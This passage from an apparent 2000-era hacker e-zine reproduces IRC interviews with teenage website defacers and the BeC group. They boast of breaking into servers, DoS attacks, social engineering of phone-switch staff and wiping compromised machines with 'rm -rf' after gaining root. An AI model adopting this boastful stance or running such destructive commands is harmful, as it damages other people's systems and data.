       [21:30] <Da_Pest> LoL
       [21:30] <p4ntera> 5-8
       [21:30] <Da_Pest> Very very weak
       [21:30] <SugarKing> you guys plan on releasing any exploits you may have written?
       [21:30] <p4ntera> yeas
       [21:30] <p4ntera> very soon
       [21:30] <Da_Pest> Yep
       [21:30] <p4ntera> we are probably gonna release some scanners
       [21:30] <p4ntera> then maybe some exploits
       [21:30] <Da_Pest> Yeah
       [21:30] <SugarKing> cool
       [21:31] <p4ntera> depends how much sexor i get in the next few days
       [21:31] <SugarKing> hah
       [21:31] <Da_Pest> LoL
       [21:31] <Da_Pest> You know ill be getting sex0r from 3r1/\/ lol
       [21:31] <SugarKing> so all members are generally kids? 15-18?
       [21:31] <p4ntera> yeah muthafuckas
       [21:31] <p4ntera> =)
       [21:31] <p4ntera> no
       [21:31] <Da_Pest> lol 
       [21:31] <p4ntera> we have some university members
       [21:31] <p4ntera> but none too old
       [21:31] <p4ntera> none too young
       [21:31] <SugarKing> oh
       [21:31] <p4ntera> around your difference
       [21:31] <p4ntera> as u said
       [21:32] <SugarKing> what are you guys trying to prove by defacing?
       [21:32] <SugarKing> anything?
       [21:32] <p4ntera> like i said
       [21:32] <p4ntera> the underground aint dead
       [21:32] <p4ntera> and
       [21:32] <p4ntera> that we, as kids, will not take the bullshit the media spews forth
       [21:32] <p4ntera> about hackers and the like
       [21:32] <SugarKing> yeah
       [21:33] <Da_Pest> Yep
       [21:33] <SugarKing> hmm
       [21:33] <Da_Pest> I dont like the stereo types
       [21:33] <SugarKing> do you guys have a site?
       [21:33] <p4ntera> not yet
       [21:33] <p4ntera> we will have one, one of our members needs 2 way cable
       [21:33] <p4ntera> :P
       [21:33] <p4ntera> www.b33r.com soon
       [21:33] <SugarKing> heheh cool
       [21:33] <Da_Pest> Plus we dont even really need one as of this monet
       [21:34] <Da_Pest> moment
       [21:34] <SugarKing> ya
       [21:34] <Da_Pest> errr.....
       [21:34] <SugarKing> do you guys plan on ever stop defacing?
       [21:34] <Da_Pest> Me No!
       [21:34] <Da_Pest> Well not for a while at least
       [21:35] <SugarKing> p4ntera?
       [21:35] <Da_Pest> He is afk
       [21:35] <SugarKing> oh
       [21:35] <Da_Pest> he is walkin his dog for a sec
       [21:35] <SugarKing> hah ok
       [21:35] <Da_Pest> He will brb
       [21:35] <Da_Pest> :)
       [21:35] <SugarKing> i hate dogs
       [21:35] <SugarKing> they're Pest's:P
       [21:35] <Da_Pest> Why?
       [21:35] <Da_Pest> Like me : )
       [21:35] <SugarKing> ya
       [21:36] <Da_Pest> I lub puppys
       [21:36] <Da_Pest> :)
       [21:36] <Da_Pest> U gots any other questions?
       [21:36] <SugarKing> ya, i'm waiting for p4ntera though
       [21:36] <Da_Pest> Oh ok
       [21:37] *** p4ntera has quit IRC (Ping timeout)
       [21:37] <SugarKing> hrm
       [21:37] <SugarKing> he'll be back
       [21:38] <Da_Pest> Yah
       [21:38] <SugarKing> so do you use different handles on IRC because you're afraid of getting caught?
       [21:38] <Da_Pest> Not so much getting caught just the fact i dont want to be bothered
       [21:39] <Da_Pest> I dont want some kid to see my defacements and bug me on irc
       [21:39] <SugarKing> ya
       [21:39] <SugarKing> how'd you meet p4ntera?
       [21:39] <Da_Pest> but partly because of the illegal activities factor =
       [21:39] <Da_Pest> Honestly we live about a few blocks away from eachother
       [21:40] <SugarKing> hah cool
       [21:40] <Da_Pest> Yah
       [21:40] <SugarKing> do you guys talk about your defacements and shit in school?
       [21:41] <Da_Pest> Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
       [21:41] <Da_Pest> Shit sorry for my spelling
       [21:41] <Da_Pest> Im just really cold 
       [21:41] <SugarKing> do your friends know that you guys are into computers?
       [21:41] <SugarKing> heh
       [21:41] <SugarKing> it's aight
       [21:42] <Da_Pest> Umm... Well some do but I dont think any know im into defacing
       [21:42] <Da_Pest> Me and p4ntera are the only ones out of my cru that are into this shit
       [21:42] <SugarKing> ya
       [21:43] <SugarKing> same as me and Clientel
       [21:43] <Da_Pest> cool
       [21:43] <SugarKing> we have one class together and he doesn't shut the hell up
       [21:43] <Da_Pest> LoL
       [21:43] <Da_Pest> What does he talk about?
       [21:44] <SugarKing> about his elite defacements
       [21:44] <SugarKing> haha nah
       [21:44] <Da_Pest> brb man im gonna log on a nother server im lagged
       [21:44] <SugarKing> he talks about computers in general
       [21:44] *** Da_Pest has quit IRC (Quit: Hey!  Where'd my controlling terminal go?)
       [21:44] <SugarKing> aight
       [21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
       [21:45] <Da_Pest> Back!
       [21:46] <SugarKing> ok
       [21:46] <SugarKing> where the hell is p4ntera?
       [21:46] <Da_Pest> He walking his damn dog
       [21:46] <SugarKing> i'll kill it
       [21:46] <Da_Pest> Sorry bout the wait
       [21:46] <Da_Pest> LoL
       [21:46] <Da_Pest> he should be here soon
       [21:47] <SugarKing> ok
       [21:47] <Da_Pest> sorry for the wait
       [21:47] <SugarKing> np
       [21:48] <Da_Pest> do u code?
       [21:48] <SugarKing> yup
       [21:48] <SugarKing> btw, to set the record, since i'm logging and it's going to be posted
       [21:48] <SugarKing> I left this group because it was only defacing
       [21:49] <SugarKing> I didn't want to do it no more
       [21:49] <Da_Pest> Ok...
       [21:49] <SugarKing> I'll keep my opinion about defacing to myself
       [21:49] <Da_Pest> Why not?
       [21:49] <SugarKing> but, I'd rather code some nasty shit:)
       [21:49] <Da_Pest> ok gitcha
       [21:49] <Da_Pest> Alot of people dont like defacing
       [21:50] <Da_Pest> But the way I see it...
       [21:50] <SugarKing> I don't see a need for it
       [21:50] <Da_Pest> If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
       [21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
       [21:51] <SugarKing> wb
       [21:51] <SugarKing> dog walker:P
       [21:51] <p4ntera> thanks
       [21:51] <p4ntera> sorry about that
       [21:51] <p4ntera> hah
       [21:51] <Da_Pest> Yah wb
       [21:51] <p4ntera> yeah man your mom is rough with the leash
       [21:51] <p4ntera> she keeps on bitin git
       [21:51] <Da_Pest> loil
       [21:51] <p4ntera> *biting it
       [21:51] <SugarKing> anyways
       [21:51] <p4ntera> =)
       [21:51] <SugarKing> back to the question
       [21:51] <SugarKing>  do you guys plan on ever stop defacing?
       [21:51] <p4ntera> yeah anyways
       [21:51] <p4ntera> maybe
       [21:51] <p4ntera> when some of us gets booked
       [21:52] <p4ntera> or we own the world
       [21:52] <Da_Pest> LoL
       [21:52] <p4ntera> which ever one comes first
       [21:52] <SugarKing> heh
       [21:52] <Da_Pest> Me never I wont stop
       [21:52] <p4ntera> yeah he well
       [21:52] <p4ntera> *will
       [21:52] <Da_Pest> I enjoy it
       [21:52] <p4ntera> i would just like to add something?
       [21:52] <p4ntera> if thats alright?
       [21:52] <SugarKing> go ahead
       [21:52] <SugarKing> you got the floor:)
       [21:52] <Da_Pest> I will never stop hax0ring and if i do good work then I believe it should not go unnoticed
       [21:52] <p4ntera> you asked whats with the "underground aint dead part"
       [21:52] <SugarKing> ya
       [21:52] <p4ntera> well
       [21:52] <p4ntera> if u noticed last year
       [21:53] <p4ntera> groups like gH,irc.psychic.com and h4g15 were defacing major websites
       [21:53] <SugarKing> ya
       [21:53] <p4ntera> showing their weak security
       [21:53] <p4ntera> now we got people like "crime boys" and artech defacing websites
       [21:53] <Da_Pest> Exactly
       [21:53] <p4ntera> and these are the people that will protect potentially high up websites?
       [21:53] <p4ntera> i dont want my bank card protected by these frontpage kiddies
       [21:54] <Da_Pest> Of course
       [21:54] <p4ntera> u know what i mean?
       [21:54] <SugarKing> yah
       [21:54] <Da_Pest> and the sad part is alot of admins are like that
       [21:54] <SugarKing> true in a sense
       [21:54] <p4ntera> yeah thats right they are
       [21:54] <Da_Pest> And i mean alot
       [21:54] <SugarKing> but what about groups like L0pht, who made their fame without defacing?
       [21:54] <p4ntera> well
       [21:54] <p4ntera> they were made in the 80's
       [21:54] <Da_Pest> Like look at all of artechs for god sakes
       [21:54] <p4ntera> when defacing was unheard of
       [21:55] <p4ntera> bbs hacking
       [21:55] <SugarKing> what about now?
       [21:55] <p4ntera> they did do the potentially "dark" side of hacking
       [21:55] <SugarKing> they could easily deface now
       [21:55] <p4ntera> yeah but they outgrown that
       [21:55] <p4ntera> its kind of a teenage thing
       [21:55] <SugarKing> so you saying you're gonna outgrow it?
       [21:55] <p4ntera> fuck when i heard mosthated was 19 i was shocked
       [21:55] <p4ntera> eventually
       [21:55] <SugarKing> heh
       [21:55] <SugarKing> ya
       [21:56] <Da_Pest> I dont think I will
       [21:56] <Da_Pest> until i get booked
       [21:56] <p4ntera> yeah he will
       [21:56] <p4ntera> heh
       [21:56] <p4ntera> anyways
       [21:56] <Da_Pest> Umm...
       [21:56] <Da_Pest> No
       [21:56] <SugarKing> in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
       [21:56] <p4ntera> yeah
       [21:56] <SugarKing> which is true
       [21:56] <p4ntera> funny thing is
       [21:56] <Da_Pest> Tru dat
       [21:56] <p4ntera> we have 2 members of team echo
       [21:56] <p4ntera> in our group
       [21:56] <p4ntera> nameless of course
       [21:56] <SugarKing> ya I know
       [21:56] <Da_Pest> hehe =)
       [21:56] <p4ntera> well, had
       [21:56] <SugarKing> had?
       [21:56] <p4ntera> one got booked
       [21:56] <SugarKing> they left?
       [21:57] <SugarKing> who?
       [21:57] <p4ntera> another one is still in
       [21:57] <p4ntera> Analognet
       [21:57] <SugarKing> Analognet was in ph33r the b33r?
       [21:57] <p4ntera> yep
       [21:57] <Da_Pest> :)
       [21:57] <p4ntera> dont be so shocked
       [21:57] <SugarKing> i didn't know
       [21:57] <p4ntera> u know who taught him how to hack nt?
       [21:57] <p4ntera> your talking to him right now
       [21:57] <SugarKing> heh
       [21:57] <p4ntera> he learned very fast
       [21:57] <Da_Pest> p4ntera is truly 1337 sh1t lol
       [21:57] <p4ntera> within a month he knew what i knew
       [21:57] <Da_Pest> He taught me alot
       [21:58] <p4ntera> and became a nt admin
       [21:58] <p4ntera> damn right negro
       [21:58] <SugarKing> cool
       [21:58] <p4ntera> =)
       [21:58] <Da_Pest> I think as a group we are progressing
       [21:58] <p4ntera> i totally agree
       [21:58] <p4ntera> 100%
       [21:58] <SugarKing> so anything we should know about with the future of ph33r the b33r?
       [21:58] <p4ntera> yeah
       [21:58] <Da_Pest> We are slowly moving are way up to bigger and better things
       [21:58] <p4ntera> we are going to  be big
       [21:58] <p4ntera> as da_pest is saying
       [21:59] <Da_Pest> And eventually we are gonna pull a gH and own a big ass site
       [21:59] <p4ntera> we are the only thing that comes close to a good group
       [21:59] <p4ntera> of course
       [21:59] <Da_Pest> And that will be a grand finale
       [21:59] <p4ntera> my boys wkD are there with us
       [21:59] <Da_Pest> Yah
       [21:59] <SugarKing> oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
       [21:59] <p4ntera> werd ka0x and BlazinWeed =)
       [21:59] <p4ntera> no
       [21:59] <p4ntera> i know my rights
       [21:59] <p4ntera> too well in fact
       [21:59] <Da_Pest> Same
       [21:59] <p4ntera> entrapment is a beautifal thing my friend
       [21:59] <p4ntera> =)
       [22:00] <Da_Pest> Plus we make sure people are legit before they join
       [22:00] <p4ntera> and thats why we hang on lame networks
       [22:00] <SugarKing> any last comments? shout out's? flames?
       [22:00] <p4ntera> cause efnet is like 98% sniffed
       [22:00] <p4ntera> well
       [22:00] <p4ntera> i would like to say to sinfony, aka john dough
       [22:00] <Da_Pest> lol
       [22:00] <Da_Pest> DIE
       [22:00] <p4ntera> that i respect his skills
       [22:00] <p4ntera> i recently found out he is r3p3nt from dhc, which kinda sucks for me
       [22:00] <p4ntera> because i respect dhc as a group
       [22:00] <p4ntera> and him especially
       [22:01] <p4ntera> even though he flamed us
       [22:01] <p4ntera> he has his skills
       [22:01] <p4ntera> but he is still a ass
       [22:01] <p4ntera> that will likely never change
       [22:01] <Da_Pest> hehe :)
       [22:01] <SugarKing> heh
       [22:01] <SugarKing> anything from you, Pest?
       [22:01] <Da_Pest> He is  a bigger ass then m4rth4 lol
       [22:01] <Da_Pest> Yah i just gotta say look out bitches cause PTB Is climbing our way up
       [22:01] <p4ntera> heh
       [22:02] <Da_Pest> And soon we will not be able to be touched
       [22:02] <p4ntera> i would like to say some more as well
       [22:02] <p4ntera> that is right
       [22:02] <p4ntera> these 3rd world countries are our playgrounds
       [22:02] <p4ntera> once we master our abilities, we are coming for the higher ups
       [22:02] <Da_Pest> Yah
       [22:02] <SugarKing> that it?:)
       [22:02] <p4ntera> once we recruit some more members, we are coming
       [22:02] <p4ntera> you cannot stop it
       [22:02] <p4ntera> no one can =)
       [22:02] <Da_Pest> Oh Yah
       [22:03] <p4ntera> and
       [22:03] <p4ntera> i would like to say
       [22:03] <p4ntera> Sugarking is one sexy cum muffin
       [22:03] <p4ntera> =)
       [22:03] <SugarKing> hahah
       [22:03] <SugarKing> thanks for the interview d00dz
       [22:03] <SugarKing> ok
       [22:03] <p4ntera> heh
       [22:04] *** Da_Pest has quit IRC (Quit: Hey!  Where'd my controlling terminal go?)
       Session Close: Thu May 04 22:04:39 2000
      
       END
       
       @HWA
       
       
327.1 [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Interview with BeC by Cruciphux Oct 2000     
      
      This is an interview with kR_d of the fledgling hacking outfit known
      only as BeC (Binary Equipment Corporation), based on DeC since that
      machine was prevalent in the movie Takedown (not released here in Canada
      at this time).
      
      It was conducted in parts across a few days and assembled here with the
      less interesting parts and chit-chat removed.
      
      One site recently defaced (and curiously STILL defaced) by BeC was the
      quantum physics lab (?) at wesleyan edu.: http://quantum.phys.wesleyan.edu/
      As far as I know it has not been listed on Attrition nor even noticed
      apparently by the admins. Some other sites were also hit with a similar
      defacement, but as our interviewee tells us, BeC is not all about defacing.
      
      
      Interviewed : Kr_D (BeC) Kr_D is a pseudonym; since others use his usual nick
                    on irc, we altered it for this interview to avoid any confusion.
      Conducted by: Cruciphux
      (Informal)
      
      http://hwa-security.net/BeC.txt
      
            
      Old school ascii art from the quantum hack:
      
      
      []-=-=_===--=-=--=w00f,-=--=-aND=--=--=_-=gr33tinGs=--=--=-fR0m----=--__=--=-=[]
      
      
      
      
      
                                            
                                                                 
                      ..                                        
                       R                                .yHJ^*^  
                       H                   _._       .C^'                _._    
                       `#                cYk"^%Hn    KH                :TGTH)
                        U,             .C"      .U   HD:         .    ####$$&'
                         K    _        KD_,,n#^^"'    CD,       d'     ""^#"'
                         H  b^^ccn,    #L^'"       .   "KGg,oY^"
                         J#^'    `:5   CD.     _,S'                  
                       o&HD:       cH   "KKg,oP^"                       
                     ,h'  ^K      .k"                              
                           KD.  .gh'                             [ KrD ]          
                            Hysdp'                    
                        ,uY#L^"                                        
                                                  .-[m0FF]                     
                                                  |     
                                           [m0FF]-'
                        
                        
      
      
                        
      []-=-===--=-=tH3--=_-=--=b1n4Ry--=--=eQUiPM3n7-=_-=--=-=-=cO0PERA7i0n=--_--=-=[] 
      
      /SNIP/
      
      
      Session Start: Sat Oct 28 17:05:18 2000
      [17:05] *** Now talking in #INTERVIEW_BeC
      [] Channel [ #INTERVIEW_BeC ] Modes [ + ]
      [17:05] -> *Kr_D* hey
      [17:06] *** Kr_D (~k0rrupt@213.x.x.x) has joined #INTERVIEW_BeC
      [17:06] <Kr_D> hell0w stevie
      [17:06] *** [HWA] sets mode: +k werebizzy
      [17:06] <[HWA]> hewo
      [17:06] <Kr_D> heh
      [17:06] <[HWA]> how are you today?
      [17:06] <[HWA]> lets interview
      [17:06] <[HWA]> :)
      [17:07] <Kr_D> i am very fine indeed
      [17:07] <Kr_D> xept for all thos P-H-O-C-K-E-N
      [17:07] <[HWA]> firstly i heard you had sex with animals when you were young is this true?
      [17:07] <Kr_D> tcpwrapped boxes
      [17:07] <[HWA]> just kidding
      [17:07] <[HWA]> lol
      [17:07] <Kr_D> everywere
      [17:07] <Kr_D> it's true
      [17:07] <Kr_D> how did you know?
      [17:07] <[HWA]> ok seriously
      [17:07] <[HWA]> hehe
      [17:07] <Kr_D> ok
      [17:07] <[HWA]> first why don't you introduce yourself
      [17:08] <Kr_D> Hi, my name is KrD
      [17:08] <Kr_D> and i'm a crackinga ddict
      [17:08] <[HWA]> then i'll get into questions
      [17:08] <Kr_D> addict even
      [17:08] <[HWA]> as opposed to a crack addict
      [17:08] <[HWA]> good
      [17:08] <[HWA]> <i'll edit this>
      [17:08] <[HWA]> what have you cracked recently?
      [17:08] <Kr_D> like, erm.. 
      [17:08] <Kr_D> distort it = edit?
      [17:08] <[HWA]> what nick shall i use for the interview?
      [17:08] <Kr_D> Kr_D
      [17:08] <[HWA]> no as in take out silly chatter
      [17:09] <[HWA]> no distortion
      [17:09] <Kr_D> sed -e 's/Kr_D/KrD;w chat.txt' 
      [17:09] <[HWA]> you want to see the copy before it is released?
      [17:09] <Kr_D> sure
      [17:09] <[HWA]> that is perfectly acceptable.
      [17:09] <Kr_D> so, no #phrack editing shit
      [17:09] <Kr_D> with evil comments
      [17:09] <[HWA]> no
      [17:09] <Kr_D> and "tounting"
      [17:09] <[HWA]> no comments
      [17:09] <Kr_D> (i like that word)
      [17:09] <[HWA]> tounting? is that like taunting only obfuscated?
      [17:10] <Kr_D> yeah
      [17:10] <[HWA]> whats your opinion of Phrack? do u hang in their channel #phrack on EFNet?
      [17:10] <Kr_D> sometimes
      [17:10] <Kr_D> i like phrack
      [17:10] <Kr_D> they don't like me thou
      [17:10] <[HWA]> why is that?
      [17:11] DNS: 213.x.x.x
      [17:11] <Kr_D> dono
      [17:11] <Kr_D> do they like anyone?
      [17:11] <[HWA]> they certainly don't tolerate vhosts they seem to have now sense of humour
      [17:11] <Kr_D> heh
      [17:11] <[HWA]> my take is they are elitist ego trippers.
      [17:11] <Kr_D> they have humor
      [17:11] <[HWA]> comment?
      [17:11] <Kr_D> sarcastic humor
      [17:11] <[HWA]> yes i laugh at them often
      [17:11] <Kr_D> they are to eleet fro them selfes
      [17:11] <Kr_D> they really are eleet
      [17:11] <[HWA]> Phrack isn't the same since Bloodaxe left
      [17:11] <Kr_D> but, it's like when,
      [17:11] <Kr_D> er,..
      [17:12] <Kr_D> yeah, like britney spears
      [17:12] <[HWA]> Chris Goggins
      [17:12] <Kr_D> look at her before she got famous
      [17:12] <Kr_D> and look at her now
      [17:12] <Kr_D> she has become more rude and stuff
      [17:12] <[HWA]> i didn't know of her before she was famous
      [17:12] <Kr_D> she thinks she is better then other
      [17:12] <[HWA]> have you defaced her?
      [17:12] <[HWA]> :)
      [17:12] <Kr_D> i have defaced her but with something else
      [17:12] <Kr_D> heh
      [17:13] <[HWA]> honestly i wouldn't mind finding a local root compromise to that snatch
      [17:13] <Kr_D> i mean, like two years ago
      [17:13] <[HWA]> but i digress
      [17:14] <Kr_D> heh
      [17:15] <[HWA]> hrm
      [17:15] <Kr_D> ok, 
      [17:15] <[HWA]> what have you cracked recently that is of import and what if any group are you affiliating with?
      [17:15] * [HWA] trys to steer back on track
      [17:16] <[HWA]> tries even
      [17:16] <Kr_D> of import 
      [17:16] <Kr_D> hmmss..
      [17:16] <[HWA]> well any then.
      [17:16] <Kr_D> heh
      [17:16] <[HWA]> what was you last crack
      [17:16] <[HWA]> not girl i mean site hack
      [17:16] <[HWA]> lol
      [17:16] <Kr_D> ah
      [17:17] *** [HWA] sets mode: +o Kr_D
      [17:17] <Kr_D> *.*.???okyo.??.jp
      [17:17] <Kr_D> my favourite is *.???.xx.jp
      [17:17] <[HWA]> what OS was it running on? i note the iis in there and think NT but ...
      [17:17] <Kr_D> it rules
      [17:17] <Kr_D> they are running al lil' bit of everything
      [17:17] <Kr_D> NT / SOlaris / IRIX / HP-UX / BSDI / RH6.2
      [17:17] <Kr_D> blah blah blah
      [17:18] <[HWA]> well what OS was the box you owned running? do you target any particular OS or what
      [17:18] <[HWA]> do you use other peoples scripts or write your own exploits/find your own holes?
      [17:18] <Kr_D> rome is running Solaris
      [17:18] <Kr_D> heh
      [17:18] <Kr_D> it depends
      [17:18] <[HWA]> did you back door them or just do hit and run hacks?
      [17:19] <Kr_D> i own them
      [17:19] <Kr_D> i don't deface usually
      [17:19] <[HWA]> do you use the boxes for DoSing? ie: install trinoo or anything on these boxes?
      [17:19] <Kr_D> i have defaced two sites this week even
      [17:19] <Kr_D> (for u)
      [17:19] <Kr_D> heh
      [17:19] <[HWA]> don't say that
      [17:19] <[HWA]> be more general
      [17:19] <Kr_D> haha
      [17:19] <[HWA]> for media attention
      [17:19] <Kr_D> DoSing is so lame
      [17:19] <[HWA]> =)
      [17:20] <[HWA]> yes but it is still very prevalent on the net, so you never packet?
      [17:20] <[HWA]> have you EVER packetted anyone?
      [17:20] <Kr_D> i packet when i want a channel
      [17:20] <[HWA]> I have in my early days.
      [17:20] <Kr_D> or when i need to get something down to be able to spoof it
      [17:20] <[HWA]> but DoSing commercial sites etc then is lame?
      [17:20] <Kr_D> 's ip
      [17:20] <[HWA]> ok
      [17:20] <[HWA]> makes sense
      [17:20] <Kr_D> i did it once, to try
      [17:21] <[HWA]> whats your opinion of say, mafiaboy?
      [17:21] <Kr_D> i DoS regulary to get bot's away
      [17:21] <Kr_D> heh
      [17:21] <Kr_D> but when i dos
      [17:21] <Kr_D> i use my own tools
      [17:21] <Kr_D> make it a lil' more eleet
      [17:21] <[HWA]> what do you think of last sunday's 0wn4ge of EFnet?
      [17:21] <Kr_D> i didnt notice ity
      [17:21] <[HWA]> by Z----- and GG-----
      [17:22] <Kr_D> heh
      [17:22] <Kr_D> it's lame
      [17:22] <Kr_D> really lame
      [17:22] <[HWA]> it happened sunday morning
      [17:22] <Kr_D> there's no meaning at all to destroy stuff
      [17:22] <[HWA]> they did it to protest mafiaboy and shadowknight's incarceration
      [17:22] <Kr_D> if i crash a box, it's because i hate the admin
      [17:22] <Kr_D> who is that mafia boy?
      [17:23] <Kr_D> i read a lil about him in hwa.hax0r.news
      [17:23] <[HWA]> how do you crash the box? forkbombs or something more destructive
      [17:23] <Kr_D> ./own.sh
      [17:23] <Kr_D> and when your root on the box
      [17:23] <[HWA]> he took out some major sites like yahoo.com and i think cnn.com using mstream
      [17:23] <Kr_D> rm -rf
      [17:23] <Kr_D> heh
      [17:23] <Kr_D> i don't like packed kiddies
      [17:23] <Kr_D> or IRCWarriors(tm)
      [17:23] <[HWA]> m_____ came up with the idea for mstream, its loosely based on tfn2k
      [17:24] <Kr_D> it's nicer to have yahoo.com
      [17:24] <Kr_D> then having crashed it
      [17:24] <[HWA]> when you deface a site do you have a message or is it just for the sake of recognition?
      [17:24] <[HWA]> what name are you trying to get out to the people?
      [17:24] <[HWA]> and why?
      [17:24] <Kr_D> its for recognition
      [17:24] <Kr_D> BeC
      [17:24] <[HWA]> are you worried about being busted?
      [17:24] <Kr_D> The binary equipment corporation
      [17:24] <Kr_D> yes
      [17:24] <[HWA]> you are in Sweden correct?
      [17:25] <Kr_D> of cause i am
      [17:25] <Kr_D> NO
      [17:25] <Kr_D> WHO THE PHUCK SAID THAT
      [17:25] <Kr_D> heh
      [17:25] <Kr_D> i'm from scandinavia
      [17:25] <[HWA]> maybe i'm conf00zed
      [17:25] <[HWA]> ah ok
      [17:25] <Kr_D> thats all you need to know
      [17:25] <[HWA]> good nuff
      [17:25] <Kr_D> muff muff
      [17:25] <[HWA]> the point was what are the computer laws like in your country?
      [17:25] <Kr_D> mean ones
      [17:26] <[HWA]> aside: how do you say greetings and props in scandanavian?
      [17:26] <Kr_D> thy shalt not 0wn(r) #phrack 0x7d0-0x7d9
      [17:26] <Kr_D> computahz
      [17:26] <[HWA]> aside: teach me some werdz
      [17:26] <Kr_D> i usually say: "hellauw"
      [17:26] <[HWA]> the laws are stringent then like the U.S
      [17:26] <Kr_D> or "hi"
      [17:26] <[HWA]> haha
      [17:27] <[HWA]> hi? thats a strange word
      [17:27] <Kr_D> yeah
      [17:27] <[HWA]> here we say garshnuggeen 
      [17:27] <[HWA]> rofl
      [17:27] <Kr_D> okey
      [17:27] <[HWA]> are u a smartass would you say?
      [17:27] <Kr_D> a smartass
      [17:27] <[HWA]> <dont worry i'll take out the silly bits>
      [17:27] <Kr_D> smartass = unknown calss
      [17:28] <Kr_D> (it rythmes, whoii)
      [17:28] <[HWA]> do you have a message for the scene or general netizens?
      [17:28] <Kr_D> class even
      [17:28] <[HWA]> nod
      [17:28] <Kr_D> BeC is god?
      [17:28] <[HWA]> ok
      [17:28] <Kr_D> good even
      [17:28] <Kr_D> heh
      [17:28] <[HWA]> and why did you choose 'BeC' as the group name?
      [17:28] <[HWA]> there is a story behind it no?
      [17:28] <Kr_D> i saw it in a movie 
      [17:28] <Kr_D> "takedown operation"
      [17:28] <[HWA]> which movie
      [17:29] <[HWA]> i haven't seen that, the mitnick movie? 
      [17:29] <Kr_D> it's based upon mitnicks lil adventures
      [17:29] <[HWA]> its not released in North America yet
      [17:29] <Kr_D> back in the 90;s
      [17:29] <Kr_D> they can't use DEC for (c) reasons
      [17:29] <[HWA]> they have no release date either, computers show no street date.
      [17:29] <Kr_D> so they choosed to call DEC BEC
      [17:29] <Kr_D> digital -> binary
      [17:29] <Kr_D> heh
      [17:29] <Kr_D> it sounded nice
      [17:29] <[HWA]> nod
      [17:29] <Kr_D> nope
      [17:29] <Kr_D> it's been out for many months
      [17:29] <[HWA]> if you see it let me know
      [17:30] <[HWA]> yes but not here
      [17:30] <Kr_D> ok
      [17:30] <[HWA]> it was released in France i believe at a film festival
      [17:30] <[HWA]> do you code?
      [17:30] <Kr_D> an yur from?
      [17:30] <Kr_D> i code
      [17:30] <[HWA]> I'm from England i'm located in Canada presently.
      [17:31] <[HWA]> :)
      [17:31] <Kr_D> heh
      [17:31] <[HWA]> how long have you been on the net, did you ever BBS?
      [17:31] <[HWA]> did you ever run a BBS?
      [17:31] <Kr_D> i'v been on the net since 96
      [17:31] <Kr_D> i still BBS
      [17:31] <[HWA]> how old are you?
      [17:31] <[HWA]> do you wardial?
      [17:31] <Kr_D> i'm 17
      [17:31] <Kr_D> soon 18
      [17:32] <Kr_D> no, i  \/\/4rd4yl
      [17:32] <[HWA]> how about telephone phun? do you phreak?
      [17:32] <Kr_D> i am a phreak
      [17:32] <Kr_D> and i phreak
      [17:32] <[HWA]> trunk seizing is phun
      [17:32] <Kr_D> i reverse enginered a ITU-T node
      [17:32] <[HWA]> what is the tone to seize a trunk in Scandinavia? its 2600 in the U.S and North America
      [17:32] <Kr_D> me and a friend drove up to the local switching station
      [17:33] <[HWA]> what did you do with it? this is the one located near ur house?
      [17:33] <Kr_D> it's two metres high and 40cm deep
      [17:33] <Kr_D> i have it right behind me
      [17:33] <Kr_D> to watch
      [17:33] <Kr_D> heh :)
      [17:33] <Kr_D> i love phones
      [17:33] <Kr_D> i have done so much shit with phones
      [17:34] <[HWA]> note: dear repairman this phone is out of service please replace it we need a new coin drop mechanism
      [17:34] <Kr_D> i can do whatever i want to whoever i want in seeden
      [17:34] <[HWA]> sweden?
      [17:34] <[HWA]> you own switches?
      [17:34] <Kr_D> darn
      [17:34] <Kr_D> oh yeah
      [17:34] <[HWA]> what is the tone you didn't answer
      [17:34] <[HWA]> 3144?
      [17:34] <Kr_D> huh?
      [17:34] <[HWA]> to seize a trunk
      [17:35] <[HWA]> its 2600hz in NA
      [17:35] <Kr_D> i don't do that phreaking stuff
      [17:35] <[HWA]> ah
      [17:35] <Kr_D> no b0xing technique
      [17:35] <[HWA]> how then do you own the equipment?
      [17:35] <Kr_D> i hax0rized them
      [17:35] <[HWA]> how do you access the internal networks?
      [17:35] <Kr_D> with my evil mind
      [17:35] <Kr_D> i find their "secret" number
      [17:35] <Kr_D> thsi si quite phun actually
      [17:35] <[HWA]> dialup and social engineering?
      [17:35] <Kr_D> they are smart them bastahs
      [17:36] <[HWA]> when you connect to the net what method do you use?
      [17:36] <Kr_D> you knwo taht there are numbers wich costs liek "2" a minute to call
      [17:36] <[HWA]> do u connect direct from home?
      [17:36] <[HWA]> nod
      [17:36] <Kr_D> they have all their evil stuff on such numbers
      [17:36] <Kr_D> where noone wardial
      [17:36] <[HWA]> aha
      [17:36] <Kr_D> but i found out
      [17:36] <[HWA]> so how do you find these without incurring charges?
      [17:36] <Kr_D> and by cheer luck
      [17:37] <Kr_D> i found a number with a kewl thing
      [17:37] <[HWA]> ?
      [17:37] <Kr_D> a support line of somekind
      [17:37] <Kr_D> i engineered them 
      [17:37] <[HWA]> its kinda vague
      [17:37] <Kr_D> they gave me a number to a support line for phoneswtiching troublke
      [17:37] <[HWA]> what is the software that controls the switches called?
      [17:37] <Kr_D> i called them up
      [17:37] <Kr_D> Local 7
      [17:37] <[HWA]> aka Cosmos
      [17:38] <[HWA]> what does it run on? 
      [17:38] <Kr_D> Local 7
      [17:38] <[HWA]> (just curious)
      [17:38] <[HWA]> do you know what the hardware is?
      [17:38] <Kr_D> ISDN switches from ericsson
      [17:38] <[HWA]> ericsson!
      [17:38] <Kr_D> they use ITU-T standard shyt
      [17:38] <Kr_D> (CCiTT-7)
      [17:39] <[HWA]> do you do conference calls?
      [17:39] <Kr_D> nope
      [17:39] <[HWA]> 'confs
      [17:39] <[HWA]> have you ever?
      [17:39] <Kr_D> noone wants to talk w/ me
      [17:39] <[HWA]> hrm what about prank calling
      [17:39] <Kr_D> i have back in 97
      [17:39] <Kr_D> i'v done that
      [17:39] <[HWA]> most phreaks seem to go thru a conf stage and prank calling stage
      [17:39] <Kr_D> i'v done alot with phones like i said
